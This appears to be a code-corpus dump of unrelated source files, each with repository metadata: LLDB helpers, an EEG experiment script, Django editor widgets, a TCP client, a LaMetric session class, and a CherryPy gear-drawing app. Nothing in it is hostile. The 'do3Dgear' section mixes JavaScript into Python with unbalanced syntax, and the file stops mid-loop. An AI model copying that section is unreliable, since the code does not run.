registersList = ['rdx', 'rcx', 'r8', 'r9']
expresssion = '(id)$' + registersList[parameterIndex]
elif arch == 'arm64':
if parameterIndex > 5:
raise Exception("Current implementation can not return object at index greater than 5 for arm64")
expresssion = '(id)$x' + str(parameterIndex + 2)
elif re.match(r'^armv.*$', arch):
if parameterIndex > 1:
raise Exception("Current implementation can not return object at index greater than 1 for arm32")
expresssion = '(id)$r' + str(parameterIndex + 2)
return expresssion
def isMacintoshArch():
arch = currentArch()
if not arch == 'x86_64':
return False
nsClassName = 'NSApplication'
command = '(void*)objc_getClass("{}")'.format(nsClassName)
return (fb.evaluateBooleanExpression(command + '!= nil'))
def isIOSSimulator():
return fb.evaluateExpressionValue('(id)[[UIDevice currentDevice] model]').GetObjectDescription().lower().find('simulator') >= 0
def isIOSDevice():
return not isMacintoshArch() and not isIOSSimulator()
|
bsd-3-clause
| 9,142,473,489,079,375,000 | 31.68 | 129 | 0.701652 | false |
yaricom/brainhash
|
src/experiment_cA4_dt_th_al_ah_bl_mc_signal_7.py
|
1
|
1887
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
The experiment with 10 Hz/5Hz, wisp, attention, 70, cA 4, delta, theta, alpha low, alpha high, beta low, batch size = 5 and
multiclass data set (BALANCED) with signal only data
@author: yaric
"""
import experiment as ex
import config
from time import time
n_hidden = 4
batch_size = 5
max_cls_samples = 7
experiment_name = 'cA_%d_%d_dt-th-a_l-a_h-b_l-b_h_mc_signal_%d' % (n_hidden, batch_size, max_cls_samples) # will be used as parent dir for analyzer results
# The sample records identifiers
signal_ids = ['IO_10_2', 'KS_10_2', 'RO_10_2']
class_lbs = ['IO', 'KS', 'RO']
noise_ids = ['noise']
# Setup analyzer configuration
analyzer_config = ex.defaultAnalyzerConfig()
analyzer_config['batch_size'] = batch_size
analyzer_config['learning_rate'] = 0.1
analyzer_config['n_hidden'] = n_hidden
analyzer_config['training_epochs'] = 50000
analyzer_config['encoder'] = 'cA'
analyzer_config['bands'] = 'delta,theta,alpha_l,alpha_h,beta_l'
start = time()
#
# Run analyzer
#
print("\nStart analysis with parameters:\n%s\n" % analyzer_config)
print("Start analysis for signal records: %s" % signal_ids)
ex.runEEGAnalyzerWithIDs(ids_list=signal_ids,
experiment_name=experiment_name,
a_config=analyzer_config)
#
# Run classifiers
#
signal_dir = "%s/%s" % (config.analyzer_out_dir, experiment_name)
out_suffix = experiment_name
print("Run classifiers over analyzed records. \nSignal dir: %s"
% (signal_dir))
ex.runSignalsOnlyClassifier(signal_dir=signal_dir,
signal_records=signal_ids,
out_suffix=out_suffix,
signal_class_labels=class_lbs,
max_cls_samples=max_cls_samples)
print("\n\nExperiment %s took %.2f seconds.\n"
% (experiment_name, time() - start))
|
gpl-3.0
| 8,388,471,490,210,353,000 | 28.968254 | 155 | 0.647059 | false |
DMOJ/site
|
judge/widgets/pagedown.py
|
1
|
3741
|
from django.contrib.admin import widgets as admin_widgets
from django.forms.utils import flatatt
from django.template.loader import get_template
from django.utils.encoding import force_text
from django.utils.html import conditional_escape
from judge.widgets.mixins import CompressorWidgetMixin
__all__ = ['PagedownWidget', 'AdminPagedownWidget',
'MathJaxPagedownWidget', 'MathJaxAdminPagedownWidget',
'HeavyPreviewPageDownWidget', 'HeavyPreviewAdminPageDownWidget']
try:
from pagedown.widgets import PagedownWidget as OldPagedownWidget
except ImportError:
PagedownWidget = None
AdminPagedownWidget = None
MathJaxPagedownWidget = None
MathJaxAdminPagedownWidget = None
HeavyPreviewPageDownWidget = None
HeavyPreviewAdminPageDownWidget = None
else:
class PagedownWidget(CompressorWidgetMixin, OldPagedownWidget):
# The goal here is to compress all the pagedown JS into one file.
# We do not want any further compress down the chain, because
# 1. we'll creating multiple large JS files to download.
# 2. this is not a problem here because all the pagedown JS files will be used together.
compress_js = True
def __init__(self, *args, **kwargs):
kwargs.setdefault('css', ('pagedown_widget.css',))
super(PagedownWidget, self).__init__(*args, **kwargs)
class AdminPagedownWidget(PagedownWidget, admin_widgets.AdminTextareaWidget):
class Media:
css = {'all': [
'content-description.css',
'admin/css/pagedown.css',
]}
js = ['admin/js/pagedown.js']
class MathJaxPagedownWidget(PagedownWidget):
class Media:
js = [
'mathjax_config.js',
'https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.5/MathJax.js?config=TeX-AMS-MML_HTMLorMML',
'pagedown_math.js',
]
class MathJaxAdminPagedownWidget(AdminPagedownWidget, MathJaxPagedownWidget):
pass
class HeavyPreviewPageDownWidget(PagedownWidget):
def __init__(self, *args, **kwargs):
kwargs.setdefault('template', 'pagedown.html')
self.preview_url = kwargs.pop('preview')
self.preview_timeout = kwargs.pop('preview_timeout', None)
self.hide_preview_button = kwargs.pop('hide_preview_button', False)
super(HeavyPreviewPageDownWidget, self).__init__(*args, **kwargs)
def render(self, name, value, attrs=None, renderer=None):
if value is None:
value = ''
final_attrs = self.build_attrs(attrs, {'name': name})
if 'class' not in final_attrs:
final_attrs['class'] = ''
final_attrs['class'] += ' wmd-input'
return get_template(self.template).render(self.get_template_context(final_attrs, value))
def get_template_context(self, attrs, value):
return {
'attrs': flatatt(attrs),
'body': conditional_escape(force_text(value)),
'id': attrs['id'],
'show_preview': self.show_preview,
'preview_url': self.preview_url,
'preview_timeout': self.preview_timeout,
'extra_classes': 'dmmd-no-button' if self.hide_preview_button else None,
}
class Media:
css = {'all': ['dmmd-preview.css']}
js = ['dmmd-preview.js']
class HeavyPreviewAdminPageDownWidget(AdminPagedownWidget, HeavyPreviewPageDownWidget):
class Media:
css = {'all': [
'pygment-github.css',
'table.css',
'ranks.css',
]}
|
agpl-3.0
| -7,868,084,420,352,699,000 | 37.96875 | 111 | 0.615878 | false |
InzamamRahaman/simple-tcp-example
|
client/TcpClient.py
|
1
|
1334
|
import socket
class TcpClient(object):
def __init__(self, port, host):
"""
Constructor for TCP Client
:param port: the port that the client is going to try and access on the server
:param host: the host of the sever
"""
self.port = port
self.host = host
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def connect(self):
"""
Connects to the server and initiates interactions
:return: None
"""
self.sock.connect((self.host, self.port))
self.interact_with_server()
def interact_with_server(self):
"""
Handles interaction with the server
:return: None
"""
message_size = 1024
block_message = 'You are not allowed to use this server!'
server_message = self.sock.recv(message_size)
print server_message
if server_message != block_message:
client_message = raw_input('Please enter a sentence:')
print 'You entered ', client_message
self.sock.send(client_message)
server_message = self.sock.recv(message_size)
print 'And received ', server_message
self.sock.close()
else:
print 'You have been blocked'
self.sock.close()
|
mit
| -5,169,483,261,950,526,000 | 29.318182 | 86 | 0.577211 | false |
keans/lmnotify
|
lmnotify/session.py
|
1
|
3431
|
import sys
from abc import ABCMeta, abstractmethod
import requests
from oauthlib.oauth2 import BackendApplicationClient
from requests_oauthlib import OAuth2Session
from .const import CLOUD_URLS
class Session(object):
"""
abstract class as base for sessions
"""
__metaclass__ = ABCMeta
def __init__(self):
self._session = None
@property
def session(self):
"""
property to access the session
(will be created on first access)
"""
if self._session is None:
self.init_session()
return self._session
@abstractmethod
def init_session(self):
"""
will automatically be called, when the session property
is accessed for the first time
"""
pass
@abstractmethod
def is_configured(self):
"""
must return True, when the session is ready to use
"""
pass
class LocalSession(Session):
"""
local session that directly communicates with the LaMetric device
without using the Cloud-API
(note: you need to register once using CloudAuth before the local
authentication can be used)
"""
def __init__(self):
Session.__init__(self)
def init_session(self):
"""
init the local session
"""
self._session = requests.Session()
def is_configured(self):
"""
local session is always configured
"""
return True
class CloudSession(Session):
"""
cloud session that uses authentication via OAuth2 with the LaMetric Cloud
"""
def __init__(
self, client_id=None, client_secret=None
):
Session.__init__(self)
# either use given credentials or get them from env variables
self.set_credentials(client_id, client_secret)
def set_credentials(self, client_id=None, client_secret=None):
"""
set given credentials and reset the session
"""
self._client_id = client_id
self._client_secret = client_secret
# make sure to reset session due to credential change
self._session = None
def is_configured(self):
"""
returns True, if cloud session is configured
"""
return self._session is not None
def init_session(self, get_token=True):
"""
init a new oauth2 session that is required to access the cloud
:param bool get_token: if True, a token will be obtained, after
the session has been created
"""
if (self._client_id is None) or (self._client_secret is None):
sys.exit(
"Please make sure to set the client id and client secret "
"via the constructor, the environment variables or the config "
"file; otherwise, the LaMetric cloud cannot be accessed. "
"Abort!"
)
self._session = OAuth2Session(
client=BackendApplicationClient(client_id=self._client_id)
)
if get_token is True:
# get oauth token
self.get_token()
def get_token(self):
"""
get current oauth token
"""
self.token = self._session.fetch_token(
token_url=CLOUD_URLS["get_token"][1],
client_id=self._client_id,
client_secret=self._client_secret
)
|
mit
| -1,433,962,306,390,378,000 | 25.596899 | 79 | 0.583795 | false |
40223226/2015cdbg8_6-22
|
wsgi.py
|
1
|
39822
|
#@+leo-ver=5-thin
#@+node:2014fall.20141212095015.1775: * @file wsgi.py
# coding=utf-8
# 上面的程式內容編碼必須在程式的第一或者第二行才會有作用
################# (1) 模組導入區
# 導入 cherrypy 模組, 為了在 OpenShift 平台上使用 cherrypy 模組, 必須透過 setup.py 安裝
#@@language python
#@@tabwidth -4
#@+<<declarations>>
#@+node:2014fall.20141212095015.1776: ** <<declarations>> (wsgi)
import cherrypy
# 導入 Python 內建的 os 模組, 因為 os 模組為 Python 內建, 所以無需透過 setup.py 安裝
import os
# 導入 random 模組
import random
# 導入 gear 模組
import gear
################# (2) 廣域變數設定區
# 確定程式檔案所在目錄, 在 Windows 下有最後的反斜線
_curdir = os.path.join(os.getcwd(), os.path.dirname(__file__))
# 設定在雲端與近端的資料儲存目錄
if 'OPENSHIFT_REPO_DIR' in os.environ.keys():
# 表示程式在雲端執行
download_root_dir = os.environ['OPENSHIFT_DATA_DIR']
data_dir = os.environ['OPENSHIFT_DATA_DIR']
else:
# 表示程式在近端執行
download_root_dir = _curdir + "/local_data/"
data_dir = _curdir + "/local_data/"
'''以下為近端 input() 與 for 迴圈應用的程式碼, 若要將程式送到 OpenShift 執行, 除了採用 CherryPy 網際框架外, 還要轉為 html 列印
# 利用 input() 取得的資料型別為字串
toprint = input("要印甚麼內容?")
# 若要將 input() 取得的字串轉為整數使用, 必須利用 int() 轉換
repeat_no = int(input("重複列印幾次?"))
for i in range(repeat_no):
print(toprint)
'''
#@-<<declarations>>
#@+others
#@+node:2014fall.20141212095015.1777: ** class Hello
################# (3) 程式類別定義區
# 以下改用 CherryPy 網際框架程式架構
# 以下為 Hello 類別的設計內容, 其中的 object 使用, 表示 Hello 類別繼承 object 的所有特性, 包括方法與屬性設計
class Hello(object):
# Hello 類別的啟動設定
_cp_config = {
'tools.encode.encoding': 'utf-8',
'tools.sessions.on' : True,
'tools.sessions.storage_type' : 'file',
#'tools.sessions.locking' : 'explicit',
# session 以檔案儲存, 而且位於 data_dir 下的 tmp 目錄
'tools.sessions.storage_path' : data_dir+'/tmp',
# session 有效時間設為 60 分鐘
'tools.sessions.timeout' : 60
}
#@+others
#@+node:2014fall.20141212095015.2004: *3* __init__
def __init__(self):
# 配合透過案例啟始建立所需的目錄
if not os.path.isdir(data_dir+'/tmp'):
os.mkdir(data_dir+'/tmp')
if not os.path.isdir(data_dir+"/downloads"):
os.mkdir(data_dir+"/downloads")
if not os.path.isdir(data_dir+"/images"):
os.mkdir(data_dir+"/images")
#@+node:2014fall.20141212095015.1778: *3* index_orig
# 以 @ 開頭的 cherrypy.expose 為 decorator, 用來表示隨後的成員方法, 可以直接讓使用者以 URL 連結執行
@cherrypy.expose
# index 方法為 CherryPy 各類別成員方法中的內建(default)方法, 當使用者執行時未指定方法, 系統將會優先執行 index 方法
# 有 self 的方法為類別中的成員方法, Python 程式透過此一 self 在各成員方法間傳遞物件內容
def index_orig(self, toprint="Hello World!"):
return toprint
#@+node:2014fall.20141212095015.1779: *3* hello
@cherrypy.expose
def hello(self, toprint="Hello World!"):
return toprint
#@+node:2014fall.20141215194146.1791: *3* index
@cherrypy.expose
def index(self):
outstring = '''
<!DOCTYPE html>
<html>
<head>
<h1>期末考練習1</h1>
<h2>40223226</h2>
<h2>張政皓</h2>
<a href="drawspur">drawgear2</a>(繪出兩顆齒輪)<br />
'''
return outstring
#@+node:2015.20150330144929.1713: *3* twoDgear
@cherrypy.expose
# N 為齒數, M 為模數, P 為壓力角
def twoDgear(self, N=20, M=5, P=15):
outstring = '''
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<!-- 載入 brython.js -->
<script type="text/javascript" src="/static/Brython3.1.1-20150328-091302/brython.js"></script>
<script src="/static/Cango2D.js" type="text/javascript"></script>
<script src="/static/gearUtils-04.js" type="text/javascript"></script>
</head>
<!-- 啟動 brython() -->
<body onload="brython()">
<form method=POST action=do2Dgear>
齒數:<input type=text name=N><br />
模數:<input type=text name=M><br />
壓力角:<input type=text name=P><br />
<input type=submit value=send>
</form>
</body>
</html>
'''
return outstring
#@+node:2015.20150331094055.1733: *3* threeDgear
@cherrypy.expose
# N 為齒數, M 為模數, P 為壓力角
def threeDgear(self, N=20, M=5, P=15):
outstring = '''
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<!-- 載入 brython.js -->
<script type="text/javascript" src="/static/Brython3.1.1-20150328-091302/brython.js"></script>
<script src="/static/Cango2D.js" type="text/javascript"></script>
<script src="/static/gearUtils-04.js" type="text/javascript"></script>
</head>
<!-- 啟動 brython() -->
<body onload="brython()">
<form method=POST action=do3Dgear>
齒數:<input type=text name=N><br />
模數:<input type=text name=M><br />
壓力角:<input type=text name=P><br />
<input type=submit value=send>
</form>
</body>
</html>
'''
return outstring
#@+node:2015.20150330144929.1762: *3* do2Dgear
@cherrypy.expose
# N 為齒數, M 為模數, P 為壓力角
def do2Dgear(self, N=20, M=5, P=15):
outstring = '''
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<!-- 載入 brython.js -->
<script type="text/javascript" src="/static/Brython3.1.1-20150328-091302/brython.js"></script>
<script src="/static/Cango2D.js" type="text/javascript"></script>
<script src="/static/gearUtils-04.js" type="text/javascript"></script>
</head>
<!-- 啟動 brython() -->
<body onload="brython()">
<!-- 以下為 canvas 畫圖程式 -->
<script type="text/python">
# 從 browser 導入 document
from browser import document
import math
# 畫布指定在名稱為 plotarea 的 canvas 上
canvas = document["plotarea"]
ctx = canvas.getContext("2d")
# 用紅色畫一條直線
ctx.beginPath()
ctx.lineWidth = 3
'''
outstring += '''
ctx.moveTo('''+str(N)+","+str(M)+")"
outstring += '''
ctx.lineTo(0, 500)
ctx.strokeStyle = "red"
ctx.stroke()
# 用藍色再畫一條直線
ctx.beginPath()
ctx.lineWidth = 3
ctx.moveTo(0, 0)
ctx.lineTo(500, 0)
ctx.strokeStyle = "blue"
ctx.stroke()
# 用綠色再畫一條直線
ctx.beginPath()
ctx.lineWidth = 3
ctx.moveTo(0, 0)
ctx.lineTo(500, 500)
ctx.strokeStyle = "green"
ctx.stroke()
# 用黑色畫一個圓
ctx.beginPath()
ctx.lineWidth = 3
ctx.strokeStyle = "black"
ctx.arc(250,250,50,0,2*math.pi)
ctx.stroke()
</script>
<canvas id="plotarea" width="800" height="600"></canvas>
</body>
</html>
'''
return outstring
#@+node:2015.20150331094055.1735: *3* do3Dgear
@cherrypy.expose
# N 為齒數, M 為模數, P 為壓力角
def do3Dgear(self, N=20, M=5, P=15):
outstring = '''
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<!-- 載入 brython.js -->
<script type="text/javascript" src="/static/Brython3.1.1-20150328-091302/brython.js"></script>
<script type="text/javascript" src="/static/weblink/pfcUtils.js"></script>
<script type="text/javascript" src="/static/weblink/wl_header.js"></script>
<script src="/static/Cango2D.js" type="text/javascript"></script>
<script src="/static/gearUtils-04.js" type="text/javascript"></script>
</head>
<!-- 啟動 brython() -->
<body onload="brython()">
<!-- 以下為 canvas 畫圖程式 -->
<script type="text/python">
# 從 browser 導入 document
from browser import document
# 從 javascript 導入 JSConstructor
from javascript import JSConstructor
import math
cango = JSConstructor(window.Cango2D)
if (!JSConstructor(window.pfcIsWindows())):
netscape.security.PrivilegeManager.enablePrivilege("UniversalXPConnect");
session = JSConstructor(window.pfcGetProESession())
# 設定 config option
session.SetConfigOption("comp_placement_assumptions","no")
# 建立擺放零件的位置矩陣
identityMatrix = JSConstructor(window.pfcCreate ("pfcMatrix3D"))
for x in range(4):
for y in range(4):
if (x == y):
JSConstructor(window.identityMatrix.Set (x, y, 1.0))
else:
JSConstructor(window.identityMatrix.Set (x, y, 0.0))
transf = JSConstructor(window.pfcCreate ("pfcTransform3D").Create (identityMatrix))
# 取得目前的工作目錄
currentDir = session.getCurrentDirectory()
# 以目前已開檔, 作為 model
model = session.CurrentModel
# 查驗有無 model, 或 model 類別是否為組立件
if (model == None or model.Type != JSConstructor(window.pfcCreate("pfcModelType").MDL_ASSEMBLY)):
raise ValueError("Current model is not an assembly.")
assembly = model
'''----------------------------------------------- link0 -------------------------------------------------------------'''
# 檔案目錄,建議將圖檔放置工作目錄下較方便使用
descr = rJSConstructor(window.pfcCreate ("pfcModelDescriptor").CreateFromFileName ("v:/home/fourbar/link0.prt"))
#若 link1.prt 在 session 則直接取用
componentModel = session.GetModelFromDescr (descr)
# 若 link1.prt 不在 session 則從工作目錄中載入 session
componentModel = session.RetrieveModel(descr)
# 若 link1.prt 已經在 session 則放入組立檔中
if (componentModel != None):
# 注意這個 asmcomp 即為設定約束條件的本體
# asmcomp 為特徵物件,直接將零件, 以 transf 座標轉換放入組立檔案中
asmcomp = assembly.AssembleComponent (componentModel, transf)
# 建立約束條件變數
constrs = JSConstructor(window.pfcCreate ("pfcComponentConstraints"))
# 設定組立檔中的三個定位面, 注意內定名稱與 Pro/E WF 中的 ASM_D_FRONT 不同, 而是 ASM_FRONT
asmDatums = ["ASM_FRONT", "ASM_TOP", "ASM_RIGHT"]
# 設定零件檔中的三個定位面, 名稱與 Pro/E WF 中相同
compDatums = ["FRONT", "TOP", "RIGHT"]
# 建立 ids 變數, intseq 為 sequence of integers 為資料類別, 使用者可以經由整數索引擷取此資料類別的元件, 第一個索引為 0
ids = JSConstructor(window.pfcCreate ("intseq"))
# 建立路徑變數
path = JSConstructor(window.pfcCreate ("MpfcAssembly").CreateComponentPath (assembly, ids))
# 採用互動式設定相關的變數
MpfcSelect = JSConstructor(window.pfcCreate ("MpfcSelect"))
# 利用迴圈分別約束組立與零件檔中的三個定位平面
for i in range(3):
# 設定組立參考面
asmItem = assembly.GetItemByName (JSConstructor(window.pfcCreate ("pfcModelItemType").ITEM_SURFACE, asmDatums [i]))
# 若無對應的組立參考面, 則啟用互動式平面選擇表單 flag
if (asmItem == None):
interactFlag = true
continue
# 設定零件參考面
compItem = componentModel.GetItemByName (JSConstructor(window.pfcCreate ("pfcModelItemType").ITEM_SURFACE, compDatums [i])
# 若無對應的零件參考面, 則啟用互動式平面選擇表單 flag
if (compItem == None):
interactFlag = true
continue;
asmSel = JSConstructor(window.MpfcSelect.CreateModelItemSelection (asmItem, path))
compSel = JSConstructor(window.MpfcSelect.CreateModelItemSelection (compItem, None))
constr = JSConstructor(window.pfcCreate ("pfcComponentConstraint").Create (JSConstructor(window.pfcCreate ("pfcComponentConstraintType").ASM_CONSTRAINT_ALIGN))
constr.AssemblyReference = asmSel
constr.ComponentReference = compSel
constr.Attributes = JSConstructor(window.pfcCreate ("pfcConstraintAttributes")).Create (false, false)
# 將互動選擇相關資料, 附加在程式約束變數之後
constrs.Append (constr)
# 設定組立約束條件
asmcomp.SetConstraints (constrs, None)
'''-------------------------------------------------------------------------------------------------------------------'''
'''----------------------------------------------- link1 -------------------------------------------------------------'''
descr = JSConstructor(window.pfcCreate ("pfcModelDescriptor")).CreateFromFileName ("v:/home/fourbar/link1.prt")
componentModel = session.GetModelFromDescr (descr)
componentModel = session.RetrieveModel(descr)
if (componentModel != None):
asmcomp = JSConstructor(window.assembly.AssembleComponent (componentModel, transf)
components = assembly.ListFeaturesByType(true, JSConstructor(window.pfcCreate ("pfcFeatureType")).FEATTYPE_COMPONENT);
featID = components.Item(0).Id
ids.append(featID)
subPath = JSConstructor(window.pfcCreate ("MpfcAssembly")).CreateComponentPath( assembly, ids )
subassembly = subPath.Leaf
asmDatums = ["A_1", "TOP", "ASM_TOP"]
compDatums = ["A_1", "TOP", "TOP"]
relation = (JSConstructor(window.pfcCreate ("pfcComponentConstraintType").ASM_CONSTRAINT_ALIGN), JSConstructor(window.pfcCreate ("pfcComponentConstraintType").ASM_CONSTRAINT_MATE);
relationItem = JSConstructor(window.pfcCreate("pfcModelItemType").ITEM_AXIS,pfcCreate("pfcModelItemType").ITEM_SURFACE))
constrs = JSConstructor(window.pfcCreate ("pfcComponentConstraints"))
for i in range(2):
asmItem = subassembly.GetItemByName (relationItem[i], asmDatums [i])
if (asmItem == None):
interactFlag = True
continue
JSConstructor(window.compItem = componentModel.GetItemByName (relationItem[i], compDatums [i]);
if (compItem == None):
interactFlag = true
continue
MpfcSelect = JSConstructor(window.pfcCreate ("MpfcSelect"))
asmSel = JSConstructor(window.MpfcSelect.CreateModelItemSelection (asmItem, subPath))
compSel = JSConstructor(window.MpfcSelect.CreateModelItemSelection (compItem, None))
constr = JSConstructor(window.pfcCreate("pfcComponentConstraint").Create (relation[i]))
constr.AssemblyReference = asmSel
constr.ComponentReference = compSel
constr.Attributes = JSConstructor(window.pfcCreate ("pfcConstraintAttributes").Create (true, false))
constrs.append (constr):
asmcomp.SetConstraints (constrs, None)
/**-------------------------------------------------------------------------------------------------------------------**/
/**----------------------------------------------- link2 -------------------------------------------------------------**/
var descr = pfcCreate ("pfcModelDescriptor").CreateFromFileName ("v:/home/fourbar/link2.prt");
var componentModel = session.GetModelFromDescr (descr);
var componentModel = session.RetrieveModel(descr);
if (componentModel != void null)
{
var asmcomp = assembly.AssembleComponent (componentModel, transf);
}
var ids = pfcCreate ("intseq");
ids.Append(featID+1);
var subPath = pfcCreate ("MpfcAssembly").CreateComponentPath( assembly, ids );
subassembly = subPath.Leaf;
var asmDatums = new Array ("A_2", "TOP", "ASM_TOP");
var compDatums = new Array ("A_1", "TOP", "TOP");
var relation = new Array (pfcCreate ("pfcComponentConstraintType").ASM_CONSTRAINT_ALIGN, pfcCreate ("pfcComponentConstraintType").ASM_CONSTRAINT_MATE);
var relationItem = new Array(pfcCreate("pfcModelItemType").ITEM_AXIS,pfcCreate("pfcModelItemType").ITEM_SURFACE);
var constrs = pfcCreate ("pfcComponentConstraints");
for (var i = 0; i < 2; i++)
{
var asmItem = subassembly.GetItemByName (relationItem[i], asmDatums [i]);
if (asmItem == void null)
{
interactFlag = true;
continue;
}
var compItem = componentModel.GetItemByName (relationItem[i], compDatums [i]);
if (compItem == void null)
{
interactFlag = true;
continue;
}
var MpfcSelect = pfcCreate ("MpfcSelect");
var asmSel = MpfcSelect.CreateModelItemSelection (asmItem, subPath);
var compSel = MpfcSelect.CreateModelItemSelection (compItem, void null);
var constr = pfcCreate ("pfcComponentConstraint").Create (relation[i]);
constr.AssemblyReference = asmSel;
constr.ComponentReference = compSel;
constr.Attributes = pfcCreate ("pfcConstraintAttributes").Create (true, false);
constrs.Append (constr);
}
asmcomp.SetConstraints (constrs, void null);
/**-------------------------------------------------------------------------------------------------------------------**/
/**----------------------------------------------- link3 -------------------------------------------------------------**/
var descr = pfcCreate ("pfcModelDescriptor").CreateFromFileName ("v:/home/fourbar/link3.prt");
var componentModel = session.GetModelFromDescr (descr);
var componentModel = session.RetrieveModel(descr);
if (componentModel != void null)
{
var asmcomp = assembly.AssembleComponent (componentModel, transf);
}
var relation = new Array (pfcCreate ("pfcComponentConstraintType").ASM_CONSTRAINT_ALIGN, pfcCreate ("pfcComponentConstraintType").ASM_CONSTRAINT_MATE);
var relationItem = new Array(pfcCreate("pfcModelItemType").ITEM_AXIS,pfcCreate("pfcModelItemType").ITEM_SURFACE);
var constrs = pfcCreate ("pfcComponentConstraints");
var ids = pfcCreate ("intseq");
ids.Append(featID+2);
var subPath = pfcCreate ("MpfcAssembly").CreateComponentPath( assembly, ids );
subassembly = subPath.Leaf;
var asmDatums = new Array ("A_2");
var compDatums = new Array ("A_1");
for (var i = 0; i < 1; i++)
{
var asmItem = subassembly.GetItemByName (relationItem[i], asmDatums [i]);
if (asmItem == void null)
{
interactFlag = true;
continue;
}
var compItem = componentModel.GetItemByName (relationItem[i], compDatums [i]);
if (compItem == void null)
{
interactFlag = true;
continue;
}
var MpfcSelect = pfcCreate ("MpfcSelect");
var asmSel = MpfcSelect.CreateModelItemSelection (asmItem, subPath);
var compSel = MpfcSelect.CreateModelItemSelection (compItem, void null);
var constr = pfcCreate ("pfcComponentConstraint").Create (relation[i]);
constr.AssemblyReference = asmSel;
constr.ComponentReference = compSel;
constr.Attributes = pfcCreate ("pfcConstraintAttributes").Create (true, false);
constrs.Append (constr);
}
asmcomp.SetConstraints (constrs, void null);
var ids = pfcCreate ("intseq");
ids.Append(featID);
var subPath = pfcCreate ("MpfcAssembly").CreateComponentPath( assembly, ids );
subassembly = subPath.Leaf;
var asmDatums = new Array ("A_2", "TOP");
var compDatums = new Array ("A_2", "BOTTON");
for (var i = 0; i < 2; i++)
{
var asmItem = subassembly.GetItemByName (relationItem[i], asmDatums [i]);
if (asmItem == void null)
{
interactFlag = true;
continue;
}
var compItem = componentModel.GetItemByName (relationItem[i], compDatums [i]);
if (compItem == void null)
{
interactFlag = true;
continue;
}
var MpfcSelect = pfcCreate ("MpfcSelect");
var asmSel = MpfcSelect.CreateModelItemSelection (asmItem, subPath);
var compSel = MpfcSelect.CreateModelItemSelection (compItem, void null);
var constr = pfcCreate ("pfcComponentConstraint").Create (relation[i]);
constr.AssemblyReference = asmSel;
constr.ComponentReference = compSel;
constr.Attributes = pfcCreate ("pfcConstraintAttributes").Create (true, true);
constrs.Append (constr);
}
asmcomp.SetConstraints (constrs, void null);
/**-------------------------------------------------------------------------------------------------------------------**/
var session = pfcGetProESession ();
var solid = session.CurrentModel;
properties = solid.GetMassProperty(void null);
var COG = properties.GravityCenter;
document.write("MassProperty:<br />");
document.write("Mass:"+(properties.Mass.toFixed(2))+" pound<br />");
document.write("Average Density:"+(properties.Density.toFixed(2))+" pound/inch^3<br />");
document.write("Surface area:"+(properties.SurfaceArea.toFixed(2))+" inch^2<br />");
document.write("Volume:"+(properties.Volume.toFixed(2))+" inch^3<br />");
document.write("COG_X:"+COG.Item(0).toFixed(2)+"<br />");
document.write("COG_Y:"+COG.Item(1).toFixed(2)+"<br />");
document.write("COG_Z:"+COG.Item(2).toFixed(2)+"<br />");
try
{
document.write("Current Directory:<br />"+currentDir);
}
catch (err)
{
alert ("Exception occurred: "+pfcGetExceptionType (err));
}
assembly.Regenerate (void null);
session.GetModelWindow (assembly).Repaint();
</script>
<canvas id="plotarea" width="800" height="600"></canvas>
</body>
</html>
'''
return outstring
#@+node:2015.20150330144929.1765: *3* mygeartest
@cherrypy.expose
# N 為齒數, M 為模數, P 為壓力角
def mygeartest(self, N=20, M=5, P=15):
outstring = '''
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<!-- 載入 brython.js -->
<script type="text/javascript" src="/static/Brython3.1.1-20150328-091302/brython.js"></script>
<script src="/static/Cango2D.js" type="text/javascript"></script>
<script src="/static/gearUtils-04.js" type="text/javascript"></script>
</head>
<!-- 啟動 brython() -->
<body onload="brython()">
<!-- 以下為 canvas 畫圖程式 -->
<script type="text/python">
# 從 browser 導入 document
from browser import document
from math import *
# 準備在 id="plotarea" 的 canvas 中繪圖
canvas = document["plotarea"]
ctx = canvas.getContext("2d")
def create_line(x1, y1, x2, y2, width=3, fill="red"):
ctx.beginPath()
ctx.lineWidth = width
ctx.moveTo(x1, y1)
ctx.lineTo(x2, y2)
ctx.strokeStyle = fill
ctx.stroke()
# 導入數學函式後, 圓周率為 pi
# deg 為角度轉為徑度的轉換因子
deg = pi/180.
#
# 以下分別為正齒輪繪圖與主 tkinter 畫布繪圖
#
# 定義一個繪正齒輪的繪圖函式
# midx 為齒輪圓心 x 座標
# midy 為齒輪圓心 y 座標
# rp 為節圓半徑, n 為齒數
def 齒輪(midx, midy, rp, n, 顏色):
# 將角度轉換因子設為全域變數
global deg
# 齒輪漸開線分成 15 線段繪製
imax = 15
# 在輸入的畫布上繪製直線, 由圓心到節圓 y 軸頂點畫一直線
create_line(midx, midy, midx, midy-rp)
# 畫出 rp 圓, 畫圓函式尚未定義
#create_oval(midx-rp, midy-rp, midx+rp, midy+rp, width=2)
# a 為模數 (代表公制中齒的大小), 模數為節圓直徑(稱為節徑)除以齒數
# 模數也就是齒冠大小
a=2*rp/n
# d 為齒根大小, 為模數的 1.157 或 1.25倍, 這裡採 1.25 倍
d=2.5*rp/n
# ra 為齒輪的外圍半徑
ra=rp+a
print("ra:", ra)
# 畫出 ra 圓, 畫圓函式尚未定義
#create_oval(midx-ra, midy-ra, midx+ra, midy+ra, width=1)
# rb 則為齒輪的基圓半徑
# 基圓為漸開線長齒之基準圓
rb=rp*cos(20*deg)
print("rp:", rp)
print("rb:", rb)
# 畫出 rb 圓 (基圓), 畫圓函式尚未定義
#create_oval(midx-rb, midy-rb, midx+rb, midy+rb, width=1)
# rd 為齒根圓半徑
rd=rp-d
# 當 rd 大於 rb 時
print("rd:", rd)
# 畫出 rd 圓 (齒根圓), 畫圓函式尚未定義
#create_oval(midx-rd, midy-rd, midx+rd, midy+rd, width=1)
# dr 則為基圓到齒頂圓半徑分成 imax 段後的每段半徑增量大小
# 將圓弧分成 imax 段來繪製漸開線
dr=(ra-rb)/imax
# tan(20*deg)-20*deg 為漸開線函數
sigma=pi/(2*n)+tan(20*deg)-20*deg
for j in range(n):
